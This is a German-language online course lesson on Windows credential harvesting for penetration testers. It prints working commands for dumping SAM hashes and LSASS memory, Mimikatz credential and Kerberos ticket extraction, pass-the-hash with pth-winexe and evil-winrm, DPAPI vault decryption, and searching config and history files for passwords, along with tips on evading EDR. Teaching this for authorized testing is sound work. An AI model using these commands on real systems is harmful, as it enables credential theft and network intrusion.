0Pricing
Ethical Hacking Academy · Lektion

Credentials erbeuten

Geheimnisse auslesen

Credentials erbeuten ist eine kostenlose Ethical Hacking Academy-Lektion auf CoddyKit. Dies ist Lektion 4 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Ethical Hacking Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.

Warum Zugangsdaten ernten?

Selbst nachdem Sie SYSTEM erreicht haben, sind die eigentlichen wertvollen Ziele oft Zugangsdaten — Passwort-Hashes, Klartextpasswörter und Tickets, mit denen Sie sich lateral weiterbewegen und die Domäne erreichen können. Credential Harvesting macht aus einem kompromittierten Rechner das gesamte Netzwerk.

Die SAM-Datenbank

Hashes lokaler Konten befinden sich in der SAM-Registrierungsstruktur und sind mit einem Schlüssel in der SYSTEM-Struktur verschlüsselt. Mit SYSTEM-Zugriff können Sie beide auslesen und NTLM-Hashes offline extrahieren.

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCAL

LSASS-Speicher

Der Prozess LSASS hält die Zugangsdaten angemeldeter Benutzer im Speicher — häufig einschließlich Klartextpasswörtern oder wiederverwendbarer NTLM-Hashes sowie Kerberos-Tickets. Das Auslesen von LSASS ist die ertragreichste Maßnahme beim Ernten von Zugangsdaten.

rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp full

Mimikatz

Mimikatz ist das bekannteste Tool zur Extraktion von Zugangsdaten. sekurlsa::logonpasswords ruft Zugangsdaten aus LSASS ab; außerdem kann es Tickets extrahieren, Pass-the-Hash durchführen und die SAM auslesen.

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

Pass-the-Hash

Oft müssen Sie einen Hash nicht knacken — Pass-the-Hash authentifiziert direkt mit dem NTLM-Hash. Deshalb reicht das Auslesen von Hashes aus, um sich lateral über Rechner hinwegzubewegen, auf denen dieselben lokalen Administratorkonten verwendet werden.

pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>

Zwischengespeicherte Domänenzugangsdaten

Domänengebundene Rechner speichern die letzten Anmeldungen zwischen (MSCache/DCC2), damit sich Benutzer offline anmelden können. Diese zwischengespeicherten Hashes können ausgelesen und offline geknackt werden (wenn auch langsam), wodurch sich Domänenpasswörter ermitteln lassen.

secretsdump.py -system system.save -security security.save LOCAL

Gespeicherte Zugangsdaten

Windows speichert Zugangsdaten im Credential Manager / Vault und als durch DPAPI geschützte Blobs (gespeicherte RDP-, Browser- und WLAN-Passwörter). Mit SYSTEM und den Master-Schlüsseln können Sie diese entschlüsseln.

cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>

Diebstahl von Kerberos-Tickets

In Active Directory exportiert Mimikatz mit sekurlsa::tickets Kerberos-TGTs/TGS. Gestohlene Tickets ermöglichen Pass-the-Ticket; ein TGT eines Domänenadministrators kann zu einer dauerhaften Golden/Silver Ticket-Persistenz führen.

sekurlsa::tickets /export

Dateien und Skripte mit Geheimnissen

Übersehen Sie nicht die naheliegenden Funde: Skripte, Konfigurationsdateien und Verlaufsdateien voller Klartextzugangsdaten. Der PowerShell-Verlauf, Dateien für die unbeaufsichtigte Installation und IIS-Web.config-Verbindungszeichenfolgen enthalten häufig Passwörter.

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.config

Bereinigung und OPSEC

Das Auslesen von LSASS wird von EDR intensiv überwacht, und Defender Credential Guard kann es blockieren. Bevorzugen Sie bei Aufträgen unauffällige Methoden, bereinigen Sie Dump-Dateien und dokumentieren Sie für den Bericht, worauf Sie zugegriffen haben.

Ethik und Autorisierung

Das Ernten von Zugangsdaten legt die sensibelsten Geheimnisse einer Organisation offen. Behandeln Sie ausgelesene Zugangsdaten sicher, exfiltrieren Sie niemals Daten außerhalb des vereinbarten Umfangs und arbeiten Sie ausschließlich mit ausdrücklicher schriftlicher Genehmigung.

Kurze Überprüfung

Testen Sie Ihr Wissen über das Ernten von Zugangsdaten.

Zusammenfassung

Sie haben das Ernten von Zugangsdaten gelernt:

  • Lesen Sie die SAM für lokale Hashes und LSASS für angemeldete Benutzer und Tickets aus
  • Mimikatz extrahiert Passwörter, Hashes und Kerberos-Tickets
  • Pass-the-Hash / Pass-the-Ticket ermöglichen laterale Bewegungen ohne vorheriges Knacken
  • Prüfen Sie Credential Manager, DPAPI sowie Konfigurations- und Verlaufsdateien auf Geheimnisse

Damit ist der Kurs zur Rechteausweitung unter Windows abgeschlossen.

Häufig gestellte Fragen

Ist die Lektion „Credentials erbeuten“ kostenlos?

Ja — der vollständige Text von „Credentials erbeuten“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Ethical Hacking Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Credentials erbeuten“?

Geheimnisse auslesen Du übst Ethical Hacking Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Ethical Hacking Academy zu starten?

Keine Vorkenntnisse erforderlich. Ethical Hacking Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 4 von 4.

Wie lange dauert die Lektion „Credentials erbeuten“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Ethical Hacking Academy-Lektion Code schreiben und ausführen?

Ja. Jede Ethical Hacking Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Windows-Enumeration
  2. Fehlkonfigurierte Dienste
  3. Token-Impersonation
  4. Credentials erbeuten
← Zurück zu Ethical Hacking Academy